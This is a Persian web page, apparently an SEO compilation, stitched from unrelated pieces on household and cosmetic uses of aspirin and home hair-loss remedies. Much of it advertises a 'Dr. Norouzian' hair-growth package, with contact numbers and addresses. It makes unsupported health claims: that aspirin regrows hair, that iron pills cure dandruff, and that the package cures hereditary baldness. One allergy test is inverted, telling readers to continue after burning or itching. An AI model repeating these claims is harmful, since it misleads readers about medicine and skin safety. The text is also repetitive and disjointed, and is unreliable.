مصرف آسپرین به رفع درد و تب محدود نمی شود، بلکه می توانید از آسپرین در کمد لباس خود نیز استفاده کنید. قبل از اینکه نسبت به از بین بردن بوی عرق از لباس مورد علاقه تان ناامید شوید، این روش را امتحان کنید: دو یا سه عدد قرص آسپرین را شکسته و پودر کنید، پودر آن را در نصف فنجان آب گرم حل کنید. آسپرین حاوی اسید سالیسیلیک است، بنابراین مانند اسید استیک موجود در سرکه عمل می کند. اسید استیک موجود در سرکه می تواند بوی بد را ز بین ببرد، اسید سالیسیلیک موجود در آسپرین هم این قابلیت را دارد. آن قسمت از لباس را که بوی نامطبوع گرفته به مدت 2 تا 3 ساعت در این محلول قرار دهید و بگذارید بماند. 

بیشتر بدانید : 10 دستورالعمل برای فرار از بوی بد عرق

بیشتر بدانید : غذاهایی که بوی عرق را زیاد و بدن را بدبو می کنند!

قرص آسپرین برای رشد مجدد موی سر

و باز هم اسید سالیسیلیک موجود در آسپرین است که باعث این ویژگی فوق العاده می شود. استفاده از محصولات مختلف، شنا کردن در استخر حاوی کلر و گذر زمان عواملی هستند که باعث می شوند رنگ موهای شما از بین برود، به ویژه اگر موهای شما دارای رنگ روشن باشد. اما می توانید با حل کردن 6 تا 8 عدد قرص آسپرین در آب گرم رنگ موهای خود را به حالت اول برگردانید. قرص های آسپرین را در یک لیوان آب گرم حل کنید و محلول را به موهای خود بمالید و 10 تا 15 دقیقه صبر کنید. این محلول را می توانید به شامپوی خود نیز اضافه کنید. 

یکی از بهترین موارد استفاده خانگی از آسپرین برای سلامت پوست شماست. سالیسیلیک اسید موجود در این دارو به کاهش التهاب و ورم پوستی کمک می کند. در صورت مشاهده یک جوش پوستی آسپرین را امتحان کنید. یک عدد قرص آسپرین را پودر کنید و با کمی آب آن را به شکل خمیر در آورید. سپس خمیر آماده شده را به صورت موضعی روی محل مورد نظر استفاده کنید. برای این کار می توانید از پنبه تمیز استفاده کنید و سپس منتظر بمانید تا خشک شود و پس از آن محل را با آب و یک مایع شوینده مناسب پوست خود بشویید. 

بیشتر بدانید : درمان جوش صورت با داروها و روش های نوین

می توانید قسمت های خشک شده کف پا را با استفاده از 5 یا 6 عدد قرص آسپرین برطرف کنید. با استفاده از 5 یا 6 عدد قرص و نصف قاشق چایخوری آب و به همان مقدار آبلیمو خمیری آماده کنید. این خمیر را روی بخش های مورد نظر پوست خود قرار دهید و آن را با پلاستیک ببندید. 10 دقیقه منتظر بمانید و پس از این مدت پای خود را بااز کنید؛ پوست این بخش نرم شده و می توانید با استفاده از سنگ پا به آرامی لایه برداری کنید. پس از آن پوست پای شما نرم خواهد بود. 

ممکن است از شوره سر خود کلافه شده باشید. می توانید دو یا سه قرص آسرین را پورد کرده و به شامپوی خود ضافه کنید. و در زمان استفاده بگذارید به مدت 1 تا 2 دقیقه روی موها بماند. سپس دوباره موها را با شامپوی ساده و بدون پودر آسپرین بشویید. 

بیشتر بدانید : 6 نکته برای درمان سریع شوره سر

بیشتر بدانید : درمان ساده شوره سر با طب سنتی + علت ایجاد شور سر

یکی دیگر از موارد استفاده از آسپرین در باغبانی است، می توانید از قرص آسپرین برای از بین بردن قارچ های داخل خاک استفاده کنید. اما به یاد داشته باشید استفاده زیاد از آسپرین باعث سوزاندن و از بین بردن گیاهان می شود. میزان مناسب آسپرین برای گیاهان یک عدد یا یک دوم قرص آسپرین در یک لیتر آب است. 

حدود 10 درصد مبتلایان به آسم شدید، به آسپرین هم حساسیت دارند – این افراد در حقیقت به تمام محصولات حاوی سالیسیلیک اسید، مهم ترین ترکیب آسپرین، حساسیت دارند؛ محصولاتی که حاوی این اسید هستند عبارتند از داروهای سرماخوردگی، میوه ها، ادویه جات و افزودنی ها. این رقم در مورد سالمندان مبتلا به آسم که به سینوزیت و پولیپ بینی هم مبتلا هستند، افزایش پیدا کرده و به 30 تا 40 درصد می رسد. همیشه قبل از مصرف هر گونه دارو با پزشک مشورت کنید و اگر به خوردن آسپرین حساسیت دارید، مصرف خارجی آن نیز توصیه نمی شود.

بیشتر بدانید : قرص آسپرین چیست و چطور عمل می کند؟

بیشتر بدانید : آنچه درباره آسپرین باید بدانید!

بیشتر بدانید : آسپرین: داروی محبوب ورزشکاران

بیشتر بدانید : اگر آسپرین مصرف می کنید، این نکات را بخوانید

بیشتر بدانید : آسپرین چه اثری بر روی کبد دارد؟

تهیه و ترجمه : گروه سلامت سیمرغseemorgh.com/healthاختصاصی سیمرغ


نام (اجباری)

آدرس پست الکترونیکی (اجباری است اما نمایش داده نمی‌شود)

تصویر امنیتی جدید

All Rights Reserved – © 2019 | باز نشر مطالب پورتال سیمرغ تنها با ذکر نام و آدرس seemorgh.com مجاز می باشد.

میدونستین که آبمیوه های گرفته شده از میوه ها و سبزیجات تازه میتونن تاثیر عمده ای بر سلامت مو داشته باشن؟ وجود آبمیوه در رژیم غذایی روزانه میتونه به مراقبت از مو در مقابل خشکی ، شکنندگی و ریزش مو کمک کنه پس از میوه های تازه و سبزیجات دارای برگ سبز در وعده های روزانه ی خود استفاده کنید زیرا باعث کاهش شکنندگی موها و افزایش رشد مو میشود و توجه به این نکته حائز اهمیته که آب میوه ها و سبزیجات ( آبمیوه ) سریعتر جذب بدن میشن و نتایج سریعتری رو هم در پی خواهند داشت .آبمیوه هایی که در این مطلب بهتون معرفی میکنم باعث رشد سریعتر موها شده و مصرف منظم اونا از نازک شدن و ریزش مو جلوگیری میکنه.

آووکادو؛ عامل زیبایی مو در ونزوئلا


آووکادو برای لاتینی ها چیزی بیشتر از یک میوه خوشمزه است. آنها آووکادو را له کرده و به موها برای رشد بیشتر می زنند.

قرص آسپرین برای رشد مجدد موی سر


این 3 ماده مهم را به شامپوهای خود اضافه کنید!!



ریزش مو یکی از مهم ترین مشکلات زیبایی است که مردان و زنان بسیاری درگیر آن هستند. تبلیغات پررنگ و لعابی که در خصوص شامپوهای تقویت کننده و ضدریزش مو در رسانه ها می بینیم،باعث شده بعضی افراد که حساسیت زیادی نسبت به موهای خود دارند، استفاده از این شامپوها را در برنامه شان قرار دهند و هرچند وقت یک بار بابت تهیه این قبیل شامپوها با برندهای مختلف پول زیادی نیز پرداخت کنند. اما راه حل چیست؟

  

◼️علل ریزش مو:

 

▪️رژیم غذایی

▪️شیوه زندگی

▪️قرار گرفتن در معرض استرس

▪️ژنتیک

 

اگر ریزش مو شما شدید است و شامپوهای گران کارساز نبوده اند در اینجا توصیه می کنیم که درمان طبیعی و موثر زیر را به کار گیرید.برای تقویت و درمان ریزش موهای سرتان نیاز به تغییر شامپو نیست کافی است 3 ماده:

 

    ✅روغن رزماری

    ✅کپسول روغن لیمو 

    ✅ویتامین E

 

را به شامپو مورد نظر اضافه کنید و از نتایج شگفت انگیز آن بهره مند شوید.پس از ساخت شامپو آن را هفته ای دو بار هنگام استحمام به همه قسمت های سرپخش نموده و با نوک انگشتانتان به آرامی روی پوست سرو موهایتان ماساژ دهید.گفتنی است، اضافه کردن این 3 ماده به شامپوهای معمولی، به شما کمک می کند که پوست سر خود را تقویت و ریزش موهایتان را کنترل کنید.

چرا موهایمان ضعیف می شود؟

شما تقریبا با اکثر عوامل ضعیف کننده ی مو آشنا هستید که شامل:

 

سشوار و اتو کشیدن موها

دکلره کردن و رنگ کردن افراطی

استفاده از برس های خشن, به خصوص برس های گرد و پیچی

 شست و شوی بیش از حد و شامپوهای نامتناسب با جنس موها

استفاده از رنگ های غیر استاندارد و رنگ کردن بیش از حد موها

 

بهترین مواد غذایی برای تقویت مو

 

🎁ماهی

به خصوص ماهی آبهای آزاد که حاوی ویتامین D و امگا 3 فراوانی هستند.

 

قرص آسپرین برای رشد مجدد موی سر

🎁گردو

این مغز بهترین منبع ویتامین E و بیوتین است که لازمه ی زیبایی پوست و مو است می باشد.

 

🎁سیب زمینی شیرین

آنتی اکسیدان سرشار سیب زمینی شیرین به کمک موهایتان خواهد آمد.

 

🎁تخم مرغ

منبع غنی از پروتئین – زینک – سلنیوم و آهن که توانایی رساندن اکسیژن کافی به موها را فراهم می کند.

 

🎁اسفناج:

در واقع اکثر سبزیجات با برگ های سبز تیره منابع خوبی از انواع ویتامین های مورد نیاز برای مو و پوست هستند.

 

🎁ماست:

کلسیم و ویتامین D موجود در آن یکی از لازمه های مو برای رشد و تقویت است.

 

🎁عدس:

حبوباتی که سرشار از آهن – زینک – بیوتین و… است برای افرادی که رژیم های لاغری دارند مناسب تر است.

 

🎁خانواده توت ها: 

این دسته از میوه ها در کنار تقویت مو به زیبایی و براقیت مو نیز کمک می کنند.

 📺کانال بزک دوزک🎀قصرعروس

درمان ریزش و تقویت موها


گل ختمی چینی


گل ختمی چینی دارای خواص طبیعی زیادی ست که می تواند به درمان ریزش مو کمک کند. علاوه بر کمک به رشد موها، این گل می تواند در درمان شوره سر، جلوگیری از موخوره، ضخیم ساختن موها و جلوگیری از سفید شدن زودهنگام موها نیز  کمک کننده باشد. برای درمان ریزش مو:


10 عدد گل ختمی چینی را به دو فنجان روغن نارگیل اضافه کنید.

این محلول را حرارت دهید تا وقتی که بسوزد و سیاه شود. سپس صاف کرده و روغن آن را جمع کنید.

این روغن را  قبل از رفتن به رختخواب به موها مالیده و بگذارید تا صبح بماند. سپس در هنگام صبح موها را بشویید.

این کار را یک تا 2 بار در هفته انجام دهید.

همچنین می توانید دمنوش این گل را درست کرده و با استفاده از آن موهایتان را شستشو دهید تا رشد بهتری پیدا کند.

شوره سر دارید آهن بخوریدکدر شدن رنگ پوست، شوره سر و شفافیت نداشتن موها ریشه در تغذیه دارد و بهترین درمان برای آن‌ها استفاده از قرص آهن است.روی و منیزم موجود در قرص‌های آهن علاوه بر از بین بردن ریزش مو باعث استحکام بخشیدن به پوست سر و صورت می‌شوند و از خارش در پوست جلوگیری می‌کنند و فرمی خاص را برای پوست و مو به وجود می آورند. نتایج مطالعات نشان می‌دهند، اگرچه درمان‌های دارویی زیادی برای کم کردن شوره سر در بازار وجود دارد اما بهترین و کم هزینه‌ترین درمان آن علاوه بر قرص آهن ماساژ سر با “عصاره‌ نعناع” و یا حنا است که پس از دو بار شاهد از بین رفتن شوره سر در موهایتان خواهید شد.


خانم ها با موهایتان این کارها را نکنید !



جام جم سرا- متخصصان زیبایی به بانوان بالای چهل سال سن توصیه می کنند برخی کارهایی که تا قبل از چهل سالگی در خصوص استفاده از محصولات زیبایی و مراقبتی پوست را انجام می دادند کاملاً فراموش کرده تا بتوانند در میانسالی و سالمندی موهای پرپشت و سالمی داشته باشند.


اکثر بانوان پس از چهل سالگی در اثر تغییرات هورمونی، کاهش ترشح روغن های مخصوص محافظت از کف سر توسط بدن و افزایش سن با مشکل ضعیف و شکننده شدن فولیکول موها و ریزش مو مواجه می شوند.


برای جلوگیری و کنترل این مشکل خانم ها باید از رنگ کردن موهای خود با رنگ موهای حاوی آمونیاک خودداری کنند.


استفاده از ژل و اسپری باعث خشکی و شکنندگی موها و ریزش شدید آنها در این دسته از خانم ها می شود.


برس کشیدن های زیاد و خشک کردن موها با سشوار با درجه حرارت بالا نیز می تواند باعث آسیب غیر قابل جبران به موها شود.


کارشناسان به بانوان در آستانه میانسالی توصیه می کنند از بلند کردن بیش از حد موهای خود خودداری کنند تا با ریزش مو مواجه نشوند همینطور ماساژ کف سر با روغن هایی چون روغن نارگیل می تواند رطوبت کف سر را حفظ کند.


تغذیه سالم، مصرف میوه و سبزی تازه، پرهیز از استرس و دوری از استعمال دخانیات همگی روش های امتحان شده برای حفظ زیبایی موها در تمام سنین هستند.


آسپرین یک مسکن و داروی ضدانعقاد پرمصرف در سرتاسر جهان است. این دارو در هر جعبه کمک های اولیه و در تمام قفسه های داروخانه ها وجود دارد. پزشکان این دارو را برای مقابله با درد و ناراحتی های عمومی و همچنین کاهش تب و مراقبت از سلامت دستگاه قلب و عروق تجویز می کنند.


ترکیب فعال اصلی آسپرین اسید سالیسیلیک است که باعث کاهش خطر سکته قلبی می شود و از انعقاد خون در افرادی که مشکلات خونی دارند پیشگیری می کند. اما آسپرین پا را فراتر گذاشته و علاوه بر این خواص درمانی مهم، ترکیبات خود را خدمت زیبایی و سلامت موها نیز قرار می دهد.


آسپرین به طور عمقی موها را تمیز می کند و باعث برطرف شدن قارچ هایی می شود که شوره و خشکی ایجاد می کنند. این قرص مسکن، گردش خون در پوست سر را بالا برده و با افزایش اکسیژن رسانی به سلول ها باعث رشد سریع موها می شود.


علاوه بر این، آسپرین تاثیر لایه برداری دارد و از این طریق می تواند پوست های مرده را دفع و جذب مواد مغذی را آسان تر کرده و پیاز موها را تقویت می کند.


 



برای بهره مندی از خواص این دارو، می توانید با آسپرین و شامپو یک ماسک موثر تهیه کنید.


مواد لازم


آسپرین        3 عدد


شامپو         3 قاشق معادل 30 گرم


 



3 عدد قرص آسپرین را آسیاب کنید و به صورت پودر در بیاورید. 3 قاشق از شامپوی روزانه خود را به آن افزوده و ترکیب کنید تا یک خمیر یکدستی حاصل شود. وقتی به حمام می روید، موهایتان را خیس کرده و ترکیب بدست آمده را روی موها بمالید.


یادتان باشد که با یک بار استفاده، معجزه ای رخ نمی دهد. برای مشاهده تاثیر این قرص روی موها باید صبور باشید.


اجازه دهید ترکیب به مدت 5 دقیقه روی موهایتان بماند و سپس با آن موهای خود را مثل همیشه شستشو دهید.


در نهایت می توانید از نرم کننده مو (اگر عادت دارید) استفاده کنید تا موهایتان نرم و ابریشمی شود.


 



لوسیون خانگی آسپرین دار، برای افزایش جلای رنگ طبیعی موها و کاهش آسیب های ناشی از آلودگی هوا و شرایط جوی موثر است. این لوسیون برای خانم هایی که موهای خود را رنگ کرده اند، اما می خواهند به رنگ اصلی موهای خود برگردند توصیه می شود.


ترکیبات لازم


آسپرین              8 عدد


آب                   نیم لیتر


 



آسپرین ها را پودر کرده و با نیم لیتر آب گرم ترکیب کنید. محلول را داخل اسپری ریخته و آن را روی موهایتان اسپری کنید. هر شب این کار را انجام دهید. یادتان باشد که قبل از مصرف، ظرف را به خوبی تکان دهید تا پودر آسپرین به خوبی در آب حل شود.


بهتر است بدانید که تاثیر درمان با آسپرین در افراد مختلف بر اساس نوع مو و سبک زندگی آنها متفاوت است.


برای رسیدن به نتایج بهتر توصیه می کنیم به طور منظم از آسپرین در برنامه مراقبت روزانه از موهایتان استفاده کنید.


بهتر است مصرف آب را افزایش داده و از مواد غذایی سرشار از بیوتین، ویتامین E و پروتئین بیشتر استفاده کنید.


برای جلوگیری از احتمال بروز هر نوع واکنش آلرژیک، ابتدا ترکیبی را که ساخته اید، روی بخش کوچکی از موها بریزید و کمی صبر کنید. اگر دچار واکنش آلرژیک مانند سوزش یا خارش شدید، می توانید از آن برای تمام موها و سرتان استفاده کنید.

یادتان باشد که با یک بار استفاده، معجزه ای رخ نمی دهد. برای مشاهده تاثیر این قرص روی موها باید صبور باشید. با استفاده منظم از آسپرین در عرض چند روز تغییرات را مشاهده کرده و خواهید دید موهایتان تمیزتر، زیباتر و سالم تر به نظر می رسد.

رفع شوره و خارش سر

از بین بردن خارش سر با روش های طبیعی

1عدد لیموترش + 2 عدد تخم مرغ + 2 ق.غ. ماست را باهم ترکیب کرده و به ریشه موها بزنید و پس از 20 الی 30 دقیقه بشویید

ریزش مو جلوی سر خانمها1ق.غ. پودر جوانه_گندم + 1ق.غ. پودر جوانه_جو + 2 ق.غ عسل را در 1 لیوان شیر مخلوط کنید و 2 ساعت بعد از صبحانه و شام بخورید

هندی ها چه کار میکنند که موهای پرپشتی دارند ؟موهای کم پشت شده با موهای ریخته شده چه کار کنیم ؟  اسرار هندی ها در داشتن موهای پرپشتموهای پرپشتی داشتم ولی الان کم پشت شده راه های پرپشت کردن مودکتر خوب برای ریزش مو راه های خانگی برای پر پشت کردن مو 

چه کار کنم که موهای از دست رفته ام برگردند ؟اینها همه سوالاتی هستند که  بسیاری از افراد با آن مواجهند .همه ی خانم ها از داشتن موهای پرپشت لذت میبرند و برای داشتن چنین موهایی از هیچ کاری دریغ نمیکنند.از ژل آلوئه ورا استفاده میکنند.بنابراین چند برگ آن را بچینید شیره ی آن را دربیاورید و به مدت دو ساعت آن را بر روی موهایتان بزنید. میتوانید شب تا صبح بر روی سرتان بگذارید که بماند اینکار گردش خون را سریعتر میکند. سپس با آب سرد بشویید.چرا که آب سرد گردش خون را بیشتر میکند و باعث تقویت موها میشود.با سرکه ی سب بشویید سرکه ی سیب باعث فعال شدن فولیکول های مو میشود.چند بار در ماه انجام دهید. از سرکه ی سیب به عنوان ماسک مو هم میتوانید استفاده کنید. ماسک پروتئنی خوب است کمبود پروتئین را جبران میکند.سفیده ی دو عدد تخم مرغ را جدا کرده و به ریشه ی موها بمالید. روغن های ضروری استفاده کنیدروغن هایی مانند روغن جوجوبا، روغن رز ماری، روغن بادام، روغن اسطوخودوس از جمله روغن هایی هستند که فولیکول مو را تقویت کنند. میتوان این روغن ها را با روغن نارگیل مخلوط کرد و به مدت 2-3 ساعت به ریشه ی موها زد و بعد با شامپو شست.

تونیک رشد مو با برند لاناریا

تونیک رشد مو با برند لاناریا

قرص رشد مو

ادرس مطب و داروخانه : آدرس غرب تهران: سعادت آباد ، بالاتر از میدان کاج ، خیابان ششم ، پلاک ۳۴ ، ساختمان پزشکان آفرین ، داروخانه دکتر رباطی ۰۹۱۰۹۸۰۰۵۳۹ – ۰۲۱۲۲۱۷۵۸۴۶ ‎۰۲۱۶۶۸۷۳۶۷۴ وقت ويزيت ۰۹۱۰۹۸۰۰۵۳۹ ۰۹۳۸۴۷۹۱۰۵۹ @fhkhaledi https://t.me/joinchat/AAAAAEJ5S73vxciOuAxBig

قرص آسپرین برای رشد مجدد موی سر

https://rouyeshmo.com

 

قرص رشد مو

خاصیت قرص آسپرین برای داشتن موهای پرپشت و براق

مو نیمی از زیبایی است اما متاسفانه به دلیل عادات نادرست تغذیه ، مراقبت و دهها فاکتور موثر دیگر تبدیل به یکی از مشکلاتی شده است که اکثر افراد برای حل ان به پزشک مراجعه می کنند . راههای پرهزینه و دوره های درمانی را سپری می کنند تا موهایی پرپشت و براق داشته باشند . در این گزارش یکی از راههای ساده برای این منظور را خواهید شناخت.

چگونه با آسپرین موهای پرپشت و براق داشته باشیم؟

یکی از موثرترین داروهای مسکن شناخته شده در جهان قرص آسپرین است اما جالب است بدانید که این دارو بجز تسکین درد استفاده های دیگری نیز دارد.

آسپرین برای اولین بار از پوست درخت بید ساخته شده بود و سابقه طولانی به عنوان یک ضد درد طبیعی دارد، حتی پزشک یونان باستان بقراط (پدر طب) برای سردرد بیماران خود آن را تجویز می کرد.

اسید سالیسیلیک، ماده فعال در آسپرین است، برای نخستین بار در سال ۱۸۹۷ فلیکس هافمن شیمیدان این دارو را کشف کرد. سالانه حدود ۴۰ هزار تن آسپرین در جهان مصرف می شود که این مقدار آن را به یکی از رایج ترین داروهای مصرفی در دنیا تبدیل کرده است.

مو یک رشته پروتئینی است که از فولیکول های موجود در لایه اپیدرم پوست رشد می کند. حال ما به شما یک راه استفاده ازآسپرین راتوصیه می کنیم که برای سلامت و زیبایی موثر است و چند مدت بعد پس از انجام آن با نتایج شگفت آوری روبه رو می شوید.

سه عدد قرص آسپرین را روی موی سرتان ماساژ دهید، ماده موجود در این قرص شوره سر را از بین می برد و موهای شما ضخیم و براق می کند.

قرص رشد مو

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دیدگاه

وبسایت

Currently you have JavaScript disabled. In order to post comments, please make sure JavaScript and Cookies are enabled, and reload the page. Click here for instructions on how to enable JavaScript in your browser.

دکتر نوروزیان نام داروخانه ومطبی در تهران با مدیریت دکتر حامد نوروزیان میباشد که از طریق تولید داروی رشد مو و ارائه این دارو به صورت پکیج رشد موی دکتر نوروزیان به شهرت خاصی رسیده.

دارو خانه دکتر نوروزیان برای اولین بار در ایران فرمولی را اختراع کرد که باعث درمان ریزش موی شما در سریع ترین زمان ممکن میشود. مهم نیست ریزش موی شما عصبی باشد یا ارثی یا به خاطر عوامل دیگر چون از هر10 نفر 8 نفر رضایتمندی کامل از استفاده از این پکیج معجزه گر را اعلام کرده اند تا جایی که پکیج رویش موی دکتر نوروزیان در حال حاظر معروف ترین وبرترین محصول ریزش مو در ایران از طرف کاربران شناخته شده است به شکلی که به طرز عجیبی این پکیج را برای یکدیگر تبلیغ میکنند.

——————————— 📍آدرس غرب تهران: سعادت آباد ، بالاتر از میدان کاج ، خیابان ششم ، پلاک ۳۴ ، ساختمان پزشکان آفرین ، داروخانه دکتر رباطی ۰۹۱۰۹۸۰۰۵۳۹ – ۰۲۱۲۲۱۷۵۸۴۶ ——————————— 📍آدرس شرق تهران : فلکه دوم تهران پارس ( ضلع جنوبی ) داروخانه دکتر ارژنگ مراجعه کنید همه روزه غیر از ایام تعطیل از ساعت ۹:۳۰ الی ۲۰ ۰۹۳۸۴۷۹۱۰۵۹ ( نزدیکترین مترو تهران پارس ) ——————————— 📍آدرس شعبه كرج : فرديس ، بين سه راه حافظيه و فلكه اول ، روبرو مسجد الزهرا ، داروخانه دکتر سميعي ۰۹۱۹۹۹۰۹۱۰۱ ————————— 📍شماره هماهنگی دیگر شهر ها ۰۲۱۶۶۸۷۳۶۷۴ ۰۹۱۰۹۸۰۰۵۳۹ @lanariateam @fhkhaledi برای دریافت اطلاعات تکمیلی ، نکات آموزشی ، پرسش و پاسخ درمورد پک رشد مو به سایت ما مراجعه کنید: https://rouyeshmo.com/ask/ عزیزان لینک کانال را به دوستان خود معرفی نمایید @rouyeshmou کانال اصلی @rouyeshmoo کانال آموزشی

اجرا شده توسط: دکترنوروزیان

02166900487

بهترین داروی رشد مو و درمان ریزش مو در جهان در سریع ترین زمان ممکن+باورنکردنی

امتحان پکیج رشد سریع مو=توصیه به دیگران و ادامه دوره

اگر تمامی روشهای رشد مو و درمان ریزش مو را امتحان کرده اید و نتیجه ای نگرفتید و یا از کاشت مو هراسانید، شاید با مشاهده این مطلب به خود بگویید این هم یکی دیگر از عناوین تبلیغاتیست که بارها امتحان کرده ام و حتما قابل اعتماد نیست ولی واقعیت این است که دوست داریم آخرین راهی که برای رشد موها در سریع زمان ممکن و به دست آوردن اعتماد به نفس دوباره خود امتحان میکنید پکیج رشد سریع موی مو تب باشد.

این را ما نمیگوییم افرادی که حتی به دلایل ارثی تاسی و ریزش موی شدید داشته اند و متاسفانه موهای خود را از دست داده اند پس از استفاده یک الی دو دوره از این محصول به این نکته مهم اعتراف کرده اند که از رشد موهای خود با این سرعت و تفاوت این محصول با روشهایی که قبلا امتحان کرده و نتیجه نگرفته اند شکه شده اند.

قرص آسپرین برای رشد مجدد موی سر

بهترین گارانتی ما نتایج شگرفیست که مصرف کنندگان پکیج رشد سریع مو به دست آورده و تصاویر ایشان در سایت و شبکه های اجتماعی رسمی ما قابل مشاهده است.

جالب است بدانید بسیاری از افرادی که به طور کامل موهایشان ریختهبود پس از مصرف 3 الی 4 دوره از این محصول حالا با اعتماد به نفس تمام در آرایشگاه موهای خود را مدل خامه ای میزنند. میدانیم این صحبتها شاید شبیه تبلیغات و تعریف از خود باشد ولی واقعیت است و این واقعیت را باید از زبان افرادی که پکیج رشد سریع مو را استفاده کرده اند بشنوید و خودتان با دیدن موهای پرپشت ایشان شک کنید که این افراد روزی ریزش شدید مو داشتند و یا کلا مو نداشتند.

البته نباید از قیمت فوق العاده ارزان این محصول قافل شد چرا که تنها با پرداخت 230 تا 290 (بسته به شرایط بدن و موی شخص درخواست کننده) شما پکیج رشد سریع موی دو دوره را خریداری خواهید کرد.

به طور میانگین در طی 4 سال فعالیت مستمر موتب با پکیج معزه گر رشد سریع مو از هر 10 نفر 8 نفر کاملا از این محصول راضی بوده و برای دوره های 1 ساله این پکیج را خریداری نموده اند تا علاوه بر رشد سریعی که موهایشان داشته با تداوم بخشیدم به مصرف دوره ای موهای رشد یافته را تقویت و دوام ببخشند.

امتحان پکیج رشد سریع مو=توصیه به دیگران و ادامه دوره

تونیک ها در دو پکیج ویژه خانم و آقا شامل: ۲ عدد محلول گیاهی، قرص مکمل و تقویتی رشد مو ویتامین، زینک پلاس آلمانی، صابون گیاهی جهت تقویت و ضخامت ساقه مو، شامپو رشد مو، این پکیج جهت مصرف دوره دو ماه است

طول درمان برای از بین رفتن ریزش مو و رشد مجدد مو بین ۴ الی ۸ دوره میباشد.

توجه: درصورت داشتن بیماری ( دیابت، بیماری قلبی، تیروئید ) داروها متغیر میباشد.

تلگرام دکتر نوروزیان tebmoo@

کانال تلگرام دکتر نوروزیان hairteb@

جهت کسب اطلاعات بیشتر در مورد آگهی ، با صاحب آگهی در ارتباط باشید

مرکز اطلاعات رشد مو دکتر نوروزیان

رشد سریع مو برای خانمها و آقایانی که از ریزش مو و یا عدم داشتن موی سر رنج میبرند بسیار مهم است و سعی در یافتن مرکزی برای درمان این مشکل که مربوط به زیبایی میشود هستند، از اینرو مرجع رسمی رشد سریع مو دکتر نوروزیان بر آن شد تا مراکز معتبر و مجرب فعال در زمینه رشد مو از طریق تولید داروها(قرص و شامپوهای رشد سریع مو) یا محلول های ترکیبی یا مکمل های گیاهی و پکیج های درمانی و موثر در درمان ریزش مو و رویش مجدد و تقویت مو در سریع ترین زمان که در راس آنها پکیج رشد مو دکتر نوروزیان قرار دارد را به این افرادی که به دنبال درمان و قطع ریزش موهای خود و رشد موهایشان میباشند معرفی بنماید. به گفته متخصصان موی معرفی شده در مرکز رشد سریع مو اثرات رویش مو از یک هفته تا 1 ماه قابل مشاهده میباشد.

معرفی و بررسی بهترین قرص رشد مو، شامپو و داروهای گیاهی برای رشد سریع مو، تقویت و درمان ریزش موی سر، همچنین جدیدترین روشهای موثر جهت رشد مو در سریع ترین زمان در مرجع کاملا تخصصی رشد سریع مو.

آدرس کانال تلگرام و ارتباط با مشاورین رشد مو:

تلگرام رشد سریع مو

کانال تلگرام رشد سریع مو

راهنمای دکتر نوروزیان و پکیج رشد مو دکتر نوروزیان، برترین پکیج درمان ریزش مو و رشد مو به همراه جدیدترین اطلاعات از آدرس و تلفن داروخانه و مطب دکتر نوروزیان

محلول رشد مو دکتر نوروزیان که همراه با پکیج رشد مو دکتر نوروزیان ارائه میگردد توانسته است رتبه بهترین پکیج درمان ریزش مو و رشد مجدد موهای ریخته شده در 3 سال متوالی را کسب نماید.

پکیج رشد مو دکتر نوروزیان 09190737370 – 02166900487

آگهی هایی از طرف مرکز اطلاعات دکتر نوروزیان(مطب و داروخانه) در مرجع رشد سریع مو درج شده است که شما متقاضی گرامی میتوانید از این طریق برای مشاوره و سپس مراجعه حضوری جهت ویزیت و دریافت نسخه از پزشک مربوطه و سپس دریافت پکیج رشد مو دکتر نوروزیان اقدام و با هماهنگی قبلی به آدرس داروخانه و مطب دکتر نوروزیان مراجعه نمایید.

کانال تلگرام

تلگرام

لازم به ذکر است هیچ تفاوتی بین مراکز چند قدم بالاتر از فلکه دوم صادقیه به سمت اشرفی اصفهانی روبروی پل عابر پیاده داروخانه دکتر فخری و فاطمی وجود ندارد و تمامی این مراکز زیر نظر دکتر نوروزیان بوده و پزشکان پوست و مو در این مرکز دانش پکیج دکتر نوروزیان را داشته و طبق شرایط الگوی ریزش بیمار، دوره درمان و جنسیت پکیج دکتر نوروزیان را تعریف مینمایند.

آدرس مطب و داروخانه دکتر نوروزیان

آدرسمطب و داروخانه پکیج دکتر نوروزیان

*چند قدم بالاتر از فلکه دوم صادقیه به سمت اشرفی اصفهانی – بعد از چهار راه سازمان آب – سمت چپ(روبروی پایانه تاکسی و اولین پل عابر پیاده) – داروخانه و مطب دکتر فخری، انتقال پیدا کرده است که پس از ویزیت و دریافت نسخه از پزشک در آدرسهای مذکور قادر به دریافت پکیج دکتر نوروزیان در آن آدرسها خواهید بود.

آدرس مطب و داروخانه پکیج مو لاناریا دکتر نوروزیان:

9:30 صبح الی 9 شب یکسره بدون نیاز به تعیین وقت

02166900487

09190737370

تمامی حقوق این سایت مربوط به رشد سریع مو دکتر نوروزیان میباشد.

شناسه آگهی :

لطفا توضیحی در مورد تخلف آگهی مورد نظر ارائه دهید

گزارش شما با موفقیت ارسال شد و در اسرع وقت توسط مدیریت بررسی خواهد شد

قرص آسپرین برای رشد مجدد موی سر
قرص آسپرین برای رشد مجدد موی سر
0

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *